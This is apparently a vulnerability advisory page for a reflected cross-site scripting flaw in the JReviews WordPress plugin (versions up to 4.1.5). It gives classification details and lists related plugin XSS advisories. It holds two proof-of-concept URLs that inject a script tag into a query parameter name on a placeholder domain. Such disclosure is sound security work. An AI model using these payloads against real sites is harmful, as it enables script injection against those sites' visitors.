JReviews <= 4.1.5 – Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/top-user-rated-listings?listview=2&q%22%3e%3cscript%3ealert(1)%3c%2fscript%3e=1
https://example.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&m%22%3e%3cscript%3ealert(1)%3c%2fscript%3e=1

Affects Plugins

jreviews

No known fix

References

URL

https://packetstormsecurity.com/files/#168669/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

6.1 (medium)

Miscellaneous

Original Researcher

CraCkEr

Verified

Yes

WPVDB ID

3adff1a7-170e-4323-8773-b39ac3c3a1d5

Timeline

Publicly Published

2022-10-10 (about 3 years ago)

Added

2022-10-12 (about 3 years ago)

Last Updated

2022-10-12 (about 3 years ago)

Other

Published

Title

Published

2024-07-04

Title

Eventin < 4.0.0 - Authenticated (Author+) Stored Cross-Site Scripting

Published

2024-04-16

Title

WP 404 Auto Redirect to Similar Post < 1.0.5 - Reflected Cross-Site Scripting via Debug Mode URI

Published

2024-11-08

Title

Embed documents shortcode <= 1.5 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-05-12

Title

itemprop WP for SERP/SEO Rich snippets <= 3.5.201706131 - Admin+ Stored XSS

Published

2025-04-23

Title

MangBoard WP < 1.8.7 - Authenticated (Administrator+) Stored Cross-Site Scripting via Board Header And Footer